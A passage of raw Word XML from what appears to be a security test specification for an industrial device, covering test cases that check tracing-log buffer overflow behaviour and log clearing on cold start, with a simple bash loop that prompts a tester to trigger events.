          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Circular-Buffer Overflow / Capacity Conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DC4C0" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="00530E8C">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6D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66DA77FA"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="623281F4" w14:textId="219EB7B3" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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F370F4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.9 / CR 2.10 </w:t>
            </w:r>
            <w:r w:rsidR="00F370F4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F370F4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F759AD7" w14:textId="68F8C039" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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30E8C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF58373" w14:textId="7CC09FD5" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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530E8C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D27C423" w14:textId="13C806E0" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4192272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and record the current log.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF5AD9C"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Generate a controlled series exceeding the documented capacity, each event individually identifiable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5211FF5B" w14:textId="77777777" w:rsidR="00045E59"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log after each block.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C81182C" w14:textId="177E1D0E" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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earliest events are overwritten and the buffer never exceeds its fixed size.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="364D2341" w14:textId="77777777" w:rsidR="00045E59"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retains all events for the retention window. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A98D20" w14:textId="5AC79933" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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the buffer caps at its fixed size and overwrites oldest-first.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DE7B9C4" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="00530E8C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCE4B47" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="00530E8C">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6D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BC253F" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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30E8C" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B68A49A" w14:textId="38A27A08" w:rsidR="00530E8C" w:rsidRPr="006D5B99"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TC-RQ012-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A7C86" w:rsidRPr="006D5B99"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4A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C86">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3496FB88" w14:textId="33270558" w:rsidR="004A7C86" w:rsidRPr="006D5B99"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it-IT"/>
              </w:rPr>
              <w:t>Kali (curl script), SRIO in operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A7C86" w:rsidRPr="006D5B99"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4A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C86">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CC239DF" w14:textId="6A4AAAB2" w:rsidR="004A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C86">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Bash script.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A7C86" w:rsidRPr="006D5B99"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4A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C86">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D8357B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2C8D448" w14:textId="2BFF3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cm_rq012-01_00_baseline.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D84AEF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56390748"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Generate at least 105 distinguishable events, e.g. repeatedly and</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64D92EE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distinctly disconnecting/reconnecting a DI channel (with a short pause</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE9DE6F"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between events so they remain distinguishable):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79074C32"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for i in $(seq 1 105); do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28030E61"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echo "Event $i: short-circuit/disconnect DI channel now, then press enter"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="184B6E97"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read</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20DE580C"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done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE478E3"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p>
          <w:p w14:paraId="33FE5C9B" w14:textId="77777777"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After every 10th event, re-read and compare the log:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40336C5E" w14:textId="02351156" w:rsidR="004A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C86">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cm_rq012-01_progress.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD59CC4" w14:textId="0FD1259F" w:rsidR="004A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C8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cm_rq012-01_00_baseline.json cm_rq012-01_progress.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A7C86" w:rsidRPr="006D5B99"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0965F42E" w:rsidR="004A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C86">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9BC588" w14:textId="7B04CE5E" w:rsidR="004A7C86" w:rsidRPr="006D5B99" w:rsidRDefault="004A7C86" w:rsidP="004A7C86">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once the documented capacity is reached (≥100 entries, SRIO-10703), the oldest entries are overwritten </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AC4343F" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3DF545" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD6016B" w14:textId="79202A92" w:rsidR="00530E8C" w:rsidRPr="006D5B99" w:rsidRDefault="003440FB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745489">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ012-02 -  </w:t>
      </w:r>
      <w:r w:rsidR="007307B4" w:rsidRPr="00745489">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cold-Start Deletion</w:t>
      </w:r>
      <w:r w:rsidR="00E41867" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00615414" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⇄</w:t>
      </w:r>
      <w:r w:rsidR="00615414" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41867" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ00</w:t>
      </w:r>
      <w:r w:rsidR="00504F72" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E41867" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-0</w:t>
      </w:r>
      <w:r w:rsidR="00504F72" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D809DA6" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRPr="006D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">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6D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28A50AF0"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BE5A6D2" w14:textId="5CCF498E" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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007307B4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.9 / CR 2.9 </w:t>
            </w:r>
            <w:r w:rsidR="007307B4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49092F85" w14:textId="773AB0EE" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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 (+Tampering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A6E4FB" w14:textId="56605342" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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D90BE6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="198DCFAC" w14:textId="620E18F9" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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Demonstrate that a cold start clears the tracing log (intervention data does not persist across a power cycle). </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="386B55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Populate the log with identifiable entries.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08CB61E7"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Apply a cold start (power cycle); read the log.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D778C5E" w14:textId="77777777" w:rsidR="008806B5"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Optionally exercise any documented non-cold recovery path and record whether entries survive (exploratory).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B212D0" w14:textId="6E50EDDA" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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Compare pre/post states.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0498F097" w14:textId="77777777" w:rsidR="008806B5"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entries persist across the reset. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2ACF04" w14:textId="6B7F1015" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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(cold start): the log is cleared after cold start. Any non-cold-recovery result is recorded factually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71AD663A" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRPr="006D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2437B4A3" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRPr="006D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">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6D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55FE8C3B" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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D90BE6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AEB2B76" w14:textId="0B0FBC77" w:rsidR="00D90BE6" w:rsidRPr="006D5B99"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TC-RQ012-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D62662" w:rsidRPr="006D5B99"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62662" w:rsidRPr="006D5B99" w:rsidRDefault="00D62662" w:rsidP="00D62662">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5B5513" w14:textId="55A19DF6" w:rsidR="00D62662" w:rsidRPr="006D5B99" w:rsidRDefault="00504F7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See TC-RQ003-04.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D62662" w:rsidRPr="006D5B99"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62662" w:rsidRPr="006D5B99" w:rsidRDefault="00D62662" w:rsidP="00D62662">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
